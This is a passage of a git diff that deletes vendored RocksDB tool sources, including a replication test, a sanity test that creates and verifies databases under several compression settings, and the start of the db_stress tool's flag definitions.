-  options.WAL_ttl_seconds = FLAGS_wal_ttl_seconds;
-  options.WAL_size_limit_MB = FLAGS_wal_size_limit_MB;
-  DB* db;
-  DestroyDB(default_db_path, options);
-
-  Status s = DB::Open(options, default_db_path, &db);
-
-  if (!s.ok()) {
-    fprintf(stderr, "Could not open DB due to %s\n", s.ToString().c_str());
-    exit(1);
-  }
-
-  DataPumpThread dataPump;
-  dataPump.no_records = FLAGS_num_inserts;
-  dataPump.db = db;
-  env->StartThread(DataPumpThreadBody, &dataPump);
-
-  ReplicationThread replThread;
-  replThread.db = db;
-  replThread.no_read = 0;
-  replThread.stop.store(false, std::memory_order_release);
-
-  env->StartThread(ReplicationThreadBody, &replThread);
-  while(replThread.no_read < FLAGS_num_inserts);
-  replThread.stop.store(true, std::memory_order_release);
-  if (replThread.no_read < dataPump.no_records) {
-    // no. read should be => than inserted.
-    fprintf(stderr,
-            "No. of Record's written and read not same\nRead : %" ROCKSDB_PRIszt
-            " Written : %" ROCKSDB_PRIszt "\n",
-            replThread.no_read, dataPump.no_records);
-    exit(1);
-  }
-  fprintf(stderr, "Successful!\n");
-  exit(0);
-}
-
-#endif  // GFLAGS
-
-#else  // ROCKSDB_LITE
-#include <stdio.h>
-int main(int argc, char** argv) {
-  fprintf(stderr, "Not supported in lite mode.\n");
-  return 1;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/db_sanity_test.cc b/thirdparty/rocksdb/tools/db_sanity_test.cc
deleted file mode 100644
index b40fe61..0000000
--- a/thirdparty/rocksdb/tools/db_sanity_test.cc
+++ /dev/null
@@ -1,297 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <cstdio>
-#include <cstdlib>
-#include <vector>
-#include <memory>
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/table.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/filter_policy.h"
-#include "port/port.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-class SanityTest {
- public:
-  explicit SanityTest(const std::string& path)
-      : env_(Env::Default()), path_(path) {
-    env_->CreateDirIfMissing(path);
-  }
-  virtual ~SanityTest() {}
-
-  virtual std::string Name() const = 0;
-  virtual Options GetOptions() const = 0;
-
-  Status Create() {
-    Options options = GetOptions();
-    options.create_if_missing = true;
-    std::string dbname = path_ + Name();
-    DestroyDB(dbname, options);
-    DB* db = nullptr;
-    Status s = DB::Open(options, dbname, &db);
-    std::unique_ptr<DB> db_guard(db);
-    if (!s.ok()) {
-      return s;
-    }
-    for (int i = 0; i < 1000000; ++i) {
-      std::string k = "key" + ToString(i);
-      std::string v = "value" + ToString(i);
-      s = db->Put(WriteOptions(), Slice(k), Slice(v));
-      if (!s.ok()) {
-        return s;
-      }
-    }
-    return db->Flush(FlushOptions());
-  }
-  Status Verify() {
-    DB* db = nullptr;
-    std::string dbname = path_ + Name();
-    Status s = DB::Open(GetOptions(), dbname, &db);
-    std::unique_ptr<DB> db_guard(db);
-    if (!s.ok()) {
-      return s;
-    }
-    for (int i = 0; i < 1000000; ++i) {
-      std::string k = "key" + ToString(i);
-      std::string v = "value" + ToString(i);
-      std::string result;
-      s = db->Get(ReadOptions(), Slice(k), &result);
-      if (!s.ok()) {
-        return s;
-      }
-      if (result != v) {
-        return Status::Corruption("Unexpected value for key " + k);
-      }
-    }
-    return Status::OK();
-  }
-
- private:
-  Env* env_;
-  std::string const path_;
-};
-
-class SanityTestBasic : public SanityTest {
- public:
-  explicit SanityTestBasic(const std::string& path) : SanityTest(path) {}
-  virtual Options GetOptions() const override {
-    Options options;
-    options.create_if_missing = true;
-    return options;
-  }
-  virtual std::string Name() const override { return "Basic"; }
-};
-
-class SanityTestSpecialComparator : public SanityTest {
- public:
-  explicit SanityTestSpecialComparator(const std::string& path)
-      : SanityTest(path) {
-    options_.comparator = new NewComparator();
-  }
-  ~SanityTestSpecialComparator() { delete options_.comparator; }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "SpecialComparator"; }
-
- private:
-  class NewComparator : public Comparator {
-   public:
-    virtual const char* Name() const override {
-      return "rocksdb.NewComparator";
-    }
-    virtual int Compare(const Slice& a, const Slice& b) const override {
-      return BytewiseComparator()->Compare(a, b);
-    }
-    virtual void FindShortestSeparator(std::string* s,
-                                       const Slice& l) const override {
-      BytewiseComparator()->FindShortestSeparator(s, l);
-    }
-    virtual void FindShortSuccessor(std::string* key) const override {
-      BytewiseComparator()->FindShortSuccessor(key);
-    }
-  };
-  Options options_;
-};
-
-class SanityTestZlibCompression : public SanityTest {
- public:
-  explicit SanityTestZlibCompression(const std::string& path)
-      : SanityTest(path) {
-    options_.compression = kZlibCompression;
-  }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "ZlibCompression"; }
-
- private:
-  Options options_;
-};
-
-class SanityTestZlibCompressionVersion2 : public SanityTest {
- public:
-  explicit SanityTestZlibCompressionVersion2(const std::string& path)
-      : SanityTest(path) {
-    options_.compression = kZlibCompression;
-    BlockBasedTableOptions table_options;
-#if ROCKSDB_MAJOR > 3 || (ROCKSDB_MAJOR == 3 && ROCKSDB_MINOR >= 10)
-    table_options.format_version = 2;
-#endif
-    options_.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override {
-    return "ZlibCompressionVersion2";
-  }
-
- private:
-  Options options_;
-};
-
-class SanityTestLZ4Compression : public SanityTest {
- public:
-  explicit SanityTestLZ4Compression(const std::string& path)
-      : SanityTest(path) {
-    options_.compression = kLZ4Compression;
-  }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "LZ4Compression"; }
-
- private:
-  Options options_;
-};
-
-class SanityTestLZ4HCCompression : public SanityTest {
- public:
-  explicit SanityTestLZ4HCCompression(const std::string& path)
-      : SanityTest(path) {
-    options_.compression = kLZ4HCCompression;
-  }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "LZ4HCCompression"; }
-
- private:
-  Options options_;
-};
-
-class SanityTestZSTDCompression : public SanityTest {
- public:
-  explicit SanityTestZSTDCompression(const std::string& path)
-      : SanityTest(path) {
-    options_.compression = kZSTD;
-  }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "ZSTDCompression"; }
-
- private:
-  Options options_;
-};
-
-#ifndef ROCKSDB_LITE
-class SanityTestPlainTableFactory : public SanityTest {
- public:
-  explicit SanityTestPlainTableFactory(const std::string& path)
-      : SanityTest(path) {
-    options_.table_factory.reset(NewPlainTableFactory());
-    options_.prefix_extractor.reset(NewFixedPrefixTransform(2));
-    options_.allow_mmap_reads = true;
-  }
-  ~SanityTestPlainTableFactory() {}
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "PlainTable"; }
-
- private:
-  Options options_;
-};
-#endif  // ROCKSDB_LITE
-
-class SanityTestBloomFilter : public SanityTest {
- public:
-  explicit SanityTestBloomFilter(const std::string& path) : SanityTest(path) {
-    BlockBasedTableOptions table_options;
-    table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-    options_.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  }
-  ~SanityTestBloomFilter() {}
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "BloomFilter"; }
-
- private:
-  Options options_;
-};
-
-namespace {
-bool RunSanityTests(const std::string& command, const std::string& path) {
-  bool result = true;
-// Suppress false positive clang static anaylzer warnings.
-#ifndef __clang_analyzer__
-  std::vector<SanityTest*> sanity_tests = {
-      new SanityTestBasic(path),
-      new SanityTestSpecialComparator(path),
-      new SanityTestZlibCompression(path),
-      new SanityTestZlibCompressionVersion2(path),
-      new SanityTestLZ4Compression(path),
-      new SanityTestLZ4HCCompression(path),
-      new SanityTestZSTDCompression(path),
-#ifndef ROCKSDB_LITE
-      new SanityTestPlainTableFactory(path),
-#endif  // ROCKSDB_LITE
-      new SanityTestBloomFilter(path)};
-
-  if (command == "create") {
-    fprintf(stderr, "Creating...\n");
-  } else {
-    fprintf(stderr, "Verifying...\n");
-  }
-  for (auto sanity_test : sanity_tests) {
-    Status s;
-    fprintf(stderr, "%s -- ", sanity_test->Name().c_str());
-    if (command == "create") {
-      s = sanity_test->Create();
-    } else {
-      assert(command == "verify");
-      s = sanity_test->Verify();
-    }
-    fprintf(stderr, "%s\n", s.ToString().c_str());
-    if (!s.ok()) {
-      fprintf(stderr, "FAIL\n");
-      result = false;
-    }
-
-    delete sanity_test;
-  }
-#endif  // __clang_analyzer__
-  return result;
-}
-}  // namespace
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  std::string path, command;
-  bool ok = (argc == 3);
-  if (ok) {
-    path = std::string(argv[1]);
-    command = std::string(argv[2]);
-    ok = (command == "create" || command == "verify");
-  }
-  if (!ok) {
-    fprintf(stderr, "Usage: %s <path> [create|verify] \n", argv[0]);
-    exit(1);
-  }
-  if (path.back() != '/') {
-    path += "/";
-  }
-
-  bool sanity_ok = rocksdb::RunSanityTests(command, path);
-
-  return sanity_ok ? 0 : 1;
-}
diff --git a/thirdparty/rocksdb/tools/db_stress.cc b/thirdparty/rocksdb/tools/db_stress.cc
deleted file mode 100644
index d18eeab..0000000
--- a/thirdparty/rocksdb/tools/db_stress.cc
+++ /dev/null
@@ -1,2527 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// The test uses an array to compare against values written to the database.
-// Keys written to the array are in 1:1 correspondence to the actual values in
-// the database according to the formula in the function GenerateValue.
-
-// Space is reserved in the array from 0 to FLAGS_max_key and values are
-// randomly written/deleted/read from those positions. During verification we
-// compare all the positions in the array. To shorten/elongate the running
-// time, you could change the settings: FLAGS_max_key, FLAGS_ops_per_thread,
-// (sometimes also FLAGS_threads).
-//
-// NOTE that if FLAGS_test_batches_snapshots is set, the test will have
-// different behavior. See comment of the flag for details.
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#define __STDC_FORMAT_MACROS
-#include <fcntl.h>
-#include <inttypes.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <sys/types.h>
-#include <algorithm>
-#include <chrono>
-#include <exception>
-#include <thread>
-
-#include <gflags/gflags.h>
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "hdfs/env_hdfs.h"
-#include "monitoring/histogram.h"
-#include "options/options_helper.h"
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "rocksdb/write_batch.h"
-#include "util/coding.h"
-#include "util/compression.h"
-#include "util/crc32c.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "util/string_util.h"
-// SyncPoint is not supported in Released Windows Mode.
-#if !(defined NDEBUG) || !defined(OS_WIN)
-#include "util/sync_point.h"
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-#include "util/testutil.h"
-
-#include "utilities/merge_operators.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::RegisterFlagValidator;
-using GFLAGS::SetUsageMessage;
-
-static const long KB = 1024;
-static const int kRandomValueMaxFactor = 3;
-static const int kValueMaxLen = 100;
-
-static bool ValidateUint32Range(const char* flagname, uint64_t value) {
-  if (value > std::numeric_limits<uint32_t>::max()) {
-    fprintf(stderr,
-            "Invalid value for --%s: %lu, overflow\n",
-            flagname,
-            (unsigned long)value);
-    return false;
-  }
-  return true;
-}
-
-DEFINE_uint64(seed, 2341234, "Seed for PRNG");
-static const bool FLAGS_seed_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_seed, &ValidateUint32Range);
-
-DEFINE_int64(max_key, 1 * KB* KB,
-             "Max number of key/values to place in database");
-
-DEFINE_int32(column_families, 10, "Number of column families");
-
-DEFINE_int64(
-    active_width, 0,
-    "Number of keys in active span of the key-range at any given time. The "
-    "span begins with its left endpoint at key 0, gradually moves rightwards, "
-    "and ends with its right endpoint at max_key. If set to 0, active_width "
-    "will be sanitized to be equal to max_key.");
-
-// TODO(noetzli) Add support for single deletes
-DEFINE_bool(test_batches_snapshots, false,
-            "If set, the test uses MultiGet(), MultiPut() and MultiDelete()"
-            " which read/write/delete multiple keys in a batch. In this mode,"
-            " we do not verify db content by comparing the content with the "
-            "pre-allocated array. Instead, we do partial verification inside"
-            " MultiGet() by checking various values in a batch. Benefit of"
-            " this mode:\n"
-            "\t(a) No need to acquire mutexes during writes (less cache "
-            "flushes in multi-core leading to speed up)\n"
-            "\t(b) No long validation at the end (more speed up)\n"
-            "\t(c) Test snapshot and atomicity of batch writes");
-
-DEFINE_int32(threads, 32, "Number of concurrent threads to run.");
-
-DEFINE_int32(ttl, -1,
-             "Opens the db with this ttl value if this is not -1. "
-             "Carefully specify a large value such that verifications on "
-             "deleted values don't fail");
-
-DEFINE_int32(value_size_mult, 8,
-             "Size of value will be this number times rand_int(1,3) bytes");
-
-DEFINE_int32(compaction_readahead_size, 0, "Compaction readahead size");
-
-DEFINE_bool(verify_before_write, false, "Verify before write");
-
-DEFINE_bool(histogram, false, "Print histogram of operation timings");
-
-DEFINE_bool(destroy_db_initially, true,
-            "Destroys the database dir before start if this is true");
-
-DEFINE_bool(verbose, false, "Verbose");
-
-DEFINE_bool(progress_reports, true,
-            "If true, db_stress will report number of finished operations");
-
-DEFINE_uint64(db_write_buffer_size, rocksdb::Options().db_write_buffer_size,
-              "Number of bytes to buffer in all memtables before compacting");
-
-DEFINE_int32(write_buffer_size,
-             static_cast<int32_t>(rocksdb::Options().write_buffer_size),
-             "Number of bytes to buffer in memtable before compacting");
-
-DEFINE_int32(max_write_buffer_number,
-             rocksdb::Options().max_write_buffer_number,
-             "The number of in-memory memtables. "
-             "Each memtable is of size FLAGS_write_buffer_size.");
-
-DEFINE_int32(min_write_buffer_number_to_merge,
-             rocksdb::Options().min_write_buffer_number_to_merge,
-             "The minimum number of write buffers that will be merged together "
-             "before writing to storage. This is cheap because it is an "
-             "in-memory merge. If this feature is not enabled, then all these "
-             "write buffers are flushed to L0 as separate files and this "
-             "increases read amplification because a get request has to check "
-             "in all of these files. Also, an in-memory merge may result in "
-             "writing less data to storage if there are duplicate records in"
-             " each of these individual write buffers.");
-
-DEFINE_int32(max_write_buffer_number_to_maintain,
-             rocksdb::Options().max_write_buffer_number_to_maintain,
-             "The total maximum number of write buffers to maintain in memory "
-             "including copies of buffers that have already been flushed. "
-             "Unlike max_write_buffer_number, this parameter does not affect "
-             "flushing. This controls the minimum amount of write history "
-             "that will be available in memory for conflict checking when "
-             "Transactions are used. If this value is too low, some "
-             "transactions may fail at commit time due to not being able to "
-             "determine whether there were any write conflicts. Setting this "
-             "value to 0 will cause write buffers to be freed immediately "
-             "after they are flushed.  If this value is set to -1, "
-             "'max_write_buffer_number' will be used.");
-
-DEFINE_double(memtable_prefix_bloom_size_ratio,
-              rocksdb::Options().memtable_prefix_bloom_size_ratio,
-              "creates prefix blooms for memtables, each with size "
-              "`write_buffer_size * memtable_prefix_bloom_size_ratio`.");
-
-DEFINE_int32(open_files, rocksdb::Options().max_open_files,
-             "Maximum number of files to keep open at the same time "
-             "(use default if == 0)");
-
-DEFINE_int64(compressed_cache_size, -1,
-             "Number of bytes to use as a cache of compressed data."
-             " Negative means use default settings.");
-
-DEFINE_int32(compaction_style, rocksdb::Options().compaction_style, "");
-
-DEFINE_int32(level0_file_num_compaction_trigger,
-             rocksdb::Options().level0_file_num_compaction_trigger,
-             "Level0 compaction start trigger");
-
-DEFINE_int32(level0_slowdown_writes_trigger,
-             rocksdb::Options().level0_slowdown_writes_trigger,
-             "Number of files in level-0 that will slow down writes");
-
-DEFINE_int32(level0_stop_writes_trigger,
-             rocksdb::Options().level0_stop_writes_trigger,
-             "Number of files in level-0 that will trigger put stop.");
-
-DEFINE_int32(block_size,
-             static_cast<int32_t>(rocksdb::BlockBasedTableOptions().block_size),
-             "Number of bytes in a block.");
-
-DEFINE_int32(max_background_compactions,
-             rocksdb::Options().max_background_compactions,
-             "The maximum number of concurrent background compactions "
-             "that can occur in parallel.");
-
-DEFINE_int32(num_bottom_pri_threads, 0,
-             "The number of threads in the bottom-priority thread pool (used "
-             "by universal compaction only).");
-
-DEFINE_int32(compaction_thread_pool_adjust_interval, 0,
-             "The interval (in milliseconds) to adjust compaction thread pool "
-             "size. Don't change it periodically if the value is 0.");
-
-DEFINE_int32(compaction_thread_pool_variations, 2,
-             "Range of background thread pool size variations when adjusted "
-             "periodically.");
-
-DEFINE_int32(max_background_flushes, rocksdb::Options().max_background_flushes,
-             "The maximum number of concurrent background flushes "
-             "that can occur in parallel.");
-
-DEFINE_int32(universal_size_ratio, 0, "The ratio of file sizes that trigger"
-             " compaction in universal style");
-
-DEFINE_int32(universal_min_merge_width, 0, "The minimum number of files to "
-             "compact in universal style compaction");
-
-DEFINE_int32(universal_max_merge_width, 0, "The max number of files to compact"
-             " in universal style compaction");
-
-DEFINE_int32(universal_max_size_amplification_percent, 0,
-             "The max size amplification for universal style compaction");
-
-DEFINE_int32(clear_column_family_one_in, 1000000,
-             "With a chance of 1/N, delete a column family and then recreate "
-             "it again. If N == 0, never drop/create column families. "
-             "When test_batches_snapshots is true, this flag has no effect");
-
-DEFINE_int32(set_options_one_in, 0,
-             "With a chance of 1/N, change some random options");
-
-DEFINE_int32(set_in_place_one_in, 0,
-             "With a chance of 1/N, toggle in place support option");
-
-DEFINE_int64(cache_size, 2LL * KB * KB * KB,
-             "Number of bytes to use as a cache of uncompressed data.");
-
-DEFINE_bool(use_clock_cache, false,
-            "Replace default LRU block cache with clock cache.");
-
-DEFINE_uint64(subcompactions, 1,
-              "Maximum number of subcompactions to divide L0-L1 compactions "
-              "into.");
-
-DEFINE_bool(allow_concurrent_memtable_write, false,
-            "Allow multi-writers to update mem tables in parallel.");
-
-DEFINE_bool(enable_write_thread_adaptive_yield, true,
-            "Use a yielding spin loop for brief writer thread waits.");
-
-static const bool FLAGS_subcompactions_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_subcompactions, &ValidateUint32Range);
-
-static bool ValidateInt32Positive(const char* flagname, int32_t value) {
-  if (value < 0) {
-    fprintf(stderr, "Invalid value for --%s: %d, must be >=0\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_int32(reopen, 10, "Number of times database reopens");
-static const bool FLAGS_reopen_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_reopen, &ValidateInt32Positive);
-
-DEFINE_int32(bloom_bits, 10, "Bloom filter bits per key. "
-             "Negative means use default settings.");
-
-DEFINE_bool(use_block_based_filter, false, "use block based filter"
-              "instead of full filter for block based table");
-
-DEFINE_string(db, "", "Use the db with the following name.");
-
-DEFINE_bool(verify_checksum, false,
-            "Verify checksum for every block read from storage");
-
-DEFINE_bool(mmap_read, rocksdb::Options().allow_mmap_reads,
-            "Allow reads to occur via mmap-ing files");
-
-DEFINE_bool(mmap_write, rocksdb::Options().allow_mmap_writes,
-            "Allow writes to occur via mmap-ing files");
-
-DEFINE_bool(use_direct_reads, rocksdb::Options().use_direct_reads,
-            "Use O_DIRECT for reading data");
-
-DEFINE_bool(use_direct_io_for_flush_and_compaction,
-            rocksdb::Options().use_direct_io_for_flush_and_compaction,
-            "Use O_DIRECT for writing data");
-
-// Database statistics
-static std::shared_ptr<rocksdb::Statistics> dbstats;
-DEFINE_bool(statistics, false, "Create database statistics");
-
-DEFINE_bool(sync, false, "Sync all writes to disk");
-
-DEFINE_bool(use_fsync, false, "If true, issue fsync instead of fdatasync");
-
-DEFINE_int32(kill_random_test, 0,
-             "If non-zero, kill at various points in source code with "
-             "probability 1/this");
-static const bool FLAGS_kill_random_test_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_kill_random_test, &ValidateInt32Positive);
-extern int rocksdb_kill_odds;
-
-DEFINE_string(kill_prefix_blacklist, "",
-              "If non-empty, kill points with prefix in the list given will be"
-              " skipped. Items are comma-separated.");
-extern std::vector<std::string> rocksdb_kill_prefix_blacklist;
-
-DEFINE_bool(disable_wal, false, "If true, do not write WAL for write.");
-
-DEFINE_int64(target_file_size_base, rocksdb::Options().target_file_size_base,
-             "Target level-1 file size for compaction");
-
-DEFINE_int32(target_file_size_multiplier, 1,
-             "A multiplier to compute target level-N file size (N >= 2)");
-
-DEFINE_uint64(max_bytes_for_level_base,
-              rocksdb::Options().max_bytes_for_level_base,
-              "Max bytes for level-1");
-
-DEFINE_double(max_bytes_for_level_multiplier, 2,
-              "A multiplier to compute max bytes for level-N (N >= 2)");
-
-DEFINE_int32(range_deletion_width, 10,
-             "The width of the range deletion intervals.");
-
-DEFINE_uint64(rate_limiter_bytes_per_sec, 0, "Set options.rate_limiter value.");
-
-DEFINE_bool(rate_limit_bg_reads, false,
-            "Use options.rate_limiter on compaction reads");
-
-// Temporarily disable this to allows it to detect new bugs
-DEFINE_int32(compact_files_one_in, 0,
-             "If non-zero, then CompactFiles() will be called one for every N "
-             "operations IN AVERAGE.  0 indicates CompactFiles() is disabled.");
-
-static bool ValidateInt32Percent(const char* flagname, int32_t value) {
-  if (value < 0 || value>100) {
-    fprintf(stderr, "Invalid value for --%s: %d, 0<= pct <=100 \n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-
-DEFINE_int32(readpercent, 10,
-             "Ratio of reads to total workload (expressed as a percentage)");
-static const bool FLAGS_readpercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_readpercent, &ValidateInt32Percent);
-
-DEFINE_int32(prefixpercent, 20,
-             "Ratio of prefix iterators to total workload (expressed as a"
-             " percentage)");
-static const bool FLAGS_prefixpercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_prefixpercent, &ValidateInt32Percent);
-
-DEFINE_int32(writepercent, 45,
-             "Ratio of writes to total workload (expressed as a percentage)");
-static const bool FLAGS_writepercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_writepercent, &ValidateInt32Percent);
-
-DEFINE_int32(delpercent, 15,
-             "Ratio of deletes to total workload (expressed as a percentage)");
-static const bool FLAGS_delpercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_delpercent, &ValidateInt32Percent);
-
-DEFINE_int32(delrangepercent, 0,
-             "Ratio of range deletions to total workload (expressed as a "
-             "percentage). Cannot be used with test_batches_snapshots");
-static const bool FLAGS_delrangepercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_delrangepercent, &ValidateInt32Percent);
-
-DEFINE_int32(nooverwritepercent, 60,
-             "Ratio of keys without overwrite to total workload (expressed as "
-             " a percentage)");
-static const bool FLAGS_nooverwritepercent_dummy __attribute__((__unused__)) =
-    RegisterFlagValidator(&FLAGS_nooverwritepercent, &ValidateInt32Percent);
-
-DEFINE_int32(iterpercent, 10, "Ratio of iterations to total workload"
-             " (expressed as a percentage)");
-static const bool FLAGS_iterpercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_iterpercent, &ValidateInt32Percent);
-
-DEFINE_uint64(num_iterations, 10, "Number of iterations per MultiIterate run");
-static const bool FLAGS_num_iterations_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_num_iterations, &ValidateUint32Range);
-
-namespace {
-enum rocksdb::CompressionType StringToCompressionType(const char* ctype) {
-  assert(ctype);
-
-  if (!strcasecmp(ctype, "none"))
-    return rocksdb::kNoCompression;
-  else if (!strcasecmp(ctype, "snappy"))
-    return rocksdb::kSnappyCompression;
-  else if (!strcasecmp(ctype, "zlib"))
-    return rocksdb::kZlibCompression;
-  else if (!strcasecmp(ctype, "bzip2"))
-    return rocksdb::kBZip2Compression;
-  else if (!strcasecmp(ctype, "lz4"))
-    return rocksdb::kLZ4Compression;
-  else if (!strcasecmp(ctype, "lz4hc"))
-    return rocksdb::kLZ4HCCompression;
-  else if (!strcasecmp(ctype, "xpress"))
-    return rocksdb::kXpressCompression;
-  else if (!strcasecmp(ctype, "zstd"))
-    return rocksdb::kZSTD;
-
-  fprintf(stderr, "Cannot parse compression type '%s'\n", ctype);
-  return rocksdb::kSnappyCompression; //default value
-}
-
-enum rocksdb::ChecksumType StringToChecksumType(const char* ctype) {
-  assert(ctype);
-  auto iter = rocksdb::checksum_type_string_map.find(ctype);
-  if (iter != rocksdb::checksum_type_string_map.end()) {
-    return iter->second;
-  }
-  fprintf(stderr, "Cannot parse checksum type '%s'\n", ctype);
-  return rocksdb::kCRC32c;
-}
-
-std::string ChecksumTypeToString(rocksdb::ChecksumType ctype) {
-  auto iter = std::find_if(
-      rocksdb::checksum_type_string_map.begin(),
-      rocksdb::checksum_type_string_map.end(),
-      [&](const std::pair<std::string, rocksdb::ChecksumType>&
-              name_and_enum_val) { return name_and_enum_val.second == ctype; });
-  assert(iter != rocksdb::checksum_type_string_map.end());
-  return iter->first;
-}
-
-std::vector<std::string> SplitString(std::string src) {
-  std::vector<std::string> ret;
-  if (src.empty()) {
-    return ret;
-  }
-  size_t pos = 0;
-  size_t pos_comma;
-  while ((pos_comma = src.find(',', pos)) != std::string::npos) {
-    ret.push_back(src.substr(pos, pos_comma - pos));
-    pos = pos_comma + 1;
-  }
-  ret.push_back(src.substr(pos, src.length()));
-  return ret;
-}
-}  // namespace
-
-DEFINE_string(compression_type, "snappy",
-              "Algorithm to use to compress the database");
-static enum rocksdb::CompressionType FLAGS_compression_type_e =
-    rocksdb::kSnappyCompression;
-
-DEFINE_string(checksum_type, "kCRC32c", "Algorithm to use to checksum blocks");
-static enum rocksdb::ChecksumType FLAGS_checksum_type_e = rocksdb::kCRC32c;
-
-DEFINE_string(hdfs, "", "Name of hdfs environment");
-// posix or hdfs environment
-static rocksdb::Env* FLAGS_env = rocksdb::Env::Default();
-
-DEFINE_uint64(ops_per_thread, 1200000, "Number of operations per thread.");
-static const bool FLAGS_ops_per_thread_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_ops_per_thread, &ValidateUint32Range);
-
-DEFINE_uint64(log2_keys_per_lock, 2, "Log2 of number of keys per lock");
-static const bool FLAGS_log2_keys_per_lock_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_log2_keys_per_lock, &ValidateUint32Range);
-
-DEFINE_bool(in_place_update, false, "On true, does inplace update in memtable");
-
-enum RepFactory {
-  kSkipList,
-  kHashSkipList,
-  kVectorRep
-};
-
-namespace {
-enum RepFactory StringToRepFactory(const char* ctype) {
-  assert(ctype);
-
-  if (!strcasecmp(ctype, "skip_list"))
-    return kSkipList;
-  else if (!strcasecmp(ctype, "prefix_hash"))
-    return kHashSkipList;
-  else if (!strcasecmp(ctype, "vector"))
-    return kVectorRep;
-
-  fprintf(stdout, "Cannot parse memreptable %s\n", ctype);
-  return kSkipList;
-}
-}  // namespace
-
-static enum RepFactory FLAGS_rep_factory;
-DEFINE_string(memtablerep, "prefix_hash", "");
-
-static bool ValidatePrefixSize(const char* flagname, int32_t value) {
-  if (value < 0 || value > 8) {
-    fprintf(stderr, "Invalid value for --%s: %d. 0 <= PrefixSize <= 8\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_int32(prefix_size, 7, "Control the prefix size for HashSkipListRep");
-static const bool FLAGS_prefix_size_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_prefix_size, &ValidatePrefixSize);
-
-DEFINE_bool(use_merge, false, "On true, replaces all writes with a Merge "
-            "that behaves like a Put");
-
-DEFINE_bool(use_full_merge_v1, false,
-            "On true, use a merge operator that implement the deprecated "
-            "version of FullMerge");
-
-namespace rocksdb {
-
-// convert long to a big-endian slice key
-static std::string Key(int64_t val) {
-  std::string little_endian_key;
-  std::string big_endian_key;
-  PutFixed64(&little_endian_key, val);
-  assert(little_endian_key.size() == sizeof(val));
-  big_endian_key.resize(sizeof(val));
-  for (size_t i = 0 ; i < sizeof(val); ++i) {
-    big_endian_key[i] = little_endian_key[sizeof(val) - 1 - i];
-  }
-  return big_endian_key;
-}
-
-static std::string StringToHex(const std::string& str) {
-  std::string result = "0x";
-  result.append(Slice(str).ToString(true));
-  return result;
-}
-
-
-class StressTest;
-namespace {
-
-class Stats {
- private:
-  uint64_t start_;
-  uint64_t finish_;
-  double  seconds_;
-  long done_;
-  long gets_;
-  long prefixes_;
-  long writes_;
-  long deletes_;
-  size_t single_deletes_;
-  long iterator_size_sums_;
-  long founds_;
-  long iterations_;
-  long range_deletions_;
-  long covered_by_range_deletions_;
-  long errors_;
-  long num_compact_files_succeed_;
-  long num_compact_files_failed_;
-  int next_report_;
-  size_t bytes_;
-  uint64_t last_op_finish_;
-  HistogramImpl hist_;
-
- public:
-  Stats() { }
-
-  void Start() {
-    next_report_ = 100;
-    hist_.Clear();
-    done_ = 0;
-    gets_ = 0;
-    prefixes_ = 0;
-    writes_ = 0;
-    deletes_ = 0;
-    single_deletes_ = 0;
